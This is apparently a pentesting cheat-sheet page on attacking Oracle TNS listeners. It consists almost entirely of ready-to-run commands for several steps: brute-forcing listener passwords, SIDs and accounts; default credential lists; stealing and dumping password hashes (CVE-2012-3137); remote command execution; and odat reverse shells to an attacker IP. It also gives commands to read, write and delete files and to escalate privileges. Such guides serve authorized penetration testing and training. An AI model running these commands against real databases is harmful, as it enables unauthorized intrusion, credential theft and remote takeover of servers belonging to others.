Oracle TNS
Pentesting Oracle TNS - TCP Ports 1521,1522-1529
Theory
Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP, -you may also get secondary listeners on 1522–1529-), it starts up a new database process and establishes a connection between the client and the Oracle database.
Practice
Enumerate version
Using nmap scripts, we can enumerate the version of the TNS-Listener
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>We can enumerate the TNS-Listener using the tnscmd10g tool
tnscmd10g version -p 1521 -h <IP>Commands & Brute-force
When enumerating Oracle the first step is to talk to the TNS-Listener
# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>
# Dump service data
tnscmd10g services -p 1521 -h <IP>
# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>
# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>If you receive an error, could be because TNS versions are incompatible (Use the --10G parameter with tnscmd10) and if the error persist, the listener may be password protected
We can use hydra to brute-force TNS-Listener password
hydra -P rockyou.txt -t 32 -s 1521 <IP> oracle-listenerTargeting SID
The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
We can brute-force SID using Hydra or Odat
#Using Hydra
hydra -L sid.txt -s 1521 <IP> oracle-sid
#Using odat
odatPLSEXTPROC sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
# Interesting Wordilists
cat /usr/share/metasploit-framework/data/wordlists/sid.txt
cat /usr/share/nmap/nselib/data/oracle-sidsIn some old versions (in 9 it works) we can enumerate the SID using tnscmd10g
#The SID are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
tnscmd10g status-p 1521 -h <IP>Targeting Accounts
Once we have found a valid SID, the next step is account enumeration. From this point, you can connect to the listener and brute-force credentials.
We can use Hydra or odat, or nmap to bruteforce accounts on a known SID
#Odat
odat passwordguesser -s $SERVER -d $SID
odat passwordguesser -s $SERVER -d $SID -p 1521 --accounts-files users.txt pass.txt
#Hydra
hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 $SERVER oracle /$SID
#Nmap
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=$SID $SERVERHere are mixed wordlists taken from hacktricks and some interesting other wordlists
# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst
# User Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt
# User/Password list
cat /usr/share/oscanner/accounts.default Below are some of the default passwords associated with Oracle:
DBSNMP/DBSNMP — Intelligent Agent uses this to talk to the db server (its some work to change it)
SYS/CHANGE_ON_INSTALL — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
PCMS_SYS/PCMS_SYS — Default x account
WMSYS/WMSYS — Default x account
OUTLN/OUTLN — Default x account
SCOTT/TIGER — Default x account
Stealremotepwds - CVE-2012-3137
Using nmap we can retreive intercept the initial traffic during authorization phase and extract a hash to bruteforce it offline:
root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.11.21.30
PORT STATE SERVICE
1521/tcp open oracle
| oracle-brute-stealth:
| Accounts
| SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1
| A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 -
| Hashed valid or invalid credentials
| Statistics
|_ Performed 241 guesses in 12 seconds, average tps: 20
john hashes.txtAlso, we can use odat
# Test module
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --test-module
# Obtain the session key and salt for user list
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --get-all-passwords --user-list /usr/share/nmap/nselib/data/oracle-default-accounts.lstDump Oracle Hashes
Password hashes in Oracle are stored in the sys.users$ or dba_users tables. With permissions, we can extract them using odat
# Test the module before use it
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --test-module
# Dump hashes
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords
# Dump hashes indirectly with CVE-2020-2984 for 12c or higher
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-ocm
# Dump hashes from history
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-from-history
# Dump hashes with DBMS_STAT
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-dbms-statsLogging into a Remote Database
To login using known credentials, we can use sqlplus
sqlplus <username>/<password>@<ip_address>:<port>/<SID>If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysoper'Remote Code Execution
If an account has system database priviledges (sysdba) or system operator (sysop) you may add following args when using odat:
--sysdba
--sysoperWe can try to execute code using odat Java Stored Procedure
# Execute commands
odat java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND
# Get a reverse shell
odat java -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>We can try to execute code using odat and Oracle Scheduler
# Execute commands
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123>>C:\hacK"
# Get a reverse shell
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>We can try to execute code using odat and Oracle External Tables
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"Read/Write files
We can try to read/write files using odat and utlfile
#Read file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/RemotePath" remote_file.txt local_file.txt
#Write file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --putFile "C:/RemotePath" remote_file.txt local_file.txt
#Remove file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --removeFile "C:/RemotePath" remote_file.txtWe can try to read files using odat and Oracle External Tables
#Read file
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/RemotePath" remote_file.txt local_file.txtOracleSQL Privilege Escalation
We may use the privesc module from odat to escalate our privileges on the DB. On that link you will find several ways to escalate privileges using odat.
#Get module Help
odat privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -hAutomation Tools
An interesting tool is oscanner, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:
#apt install oscanner
oscanner -s <IP> -P <PORT>Another tool that will do all of this is odat
# Bruteforce SID and check all
odat all -s <IP> -p <PORT>
# Bruteforce accounts for that SID and check all
odat all -s <IP> -p <PORT> -d <SID>
# Check all for that acccount
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD>
# Check all for that acccount as SYSDBA or SYSOPER
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysdba
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysoperResources
Last updated
Was this helpful?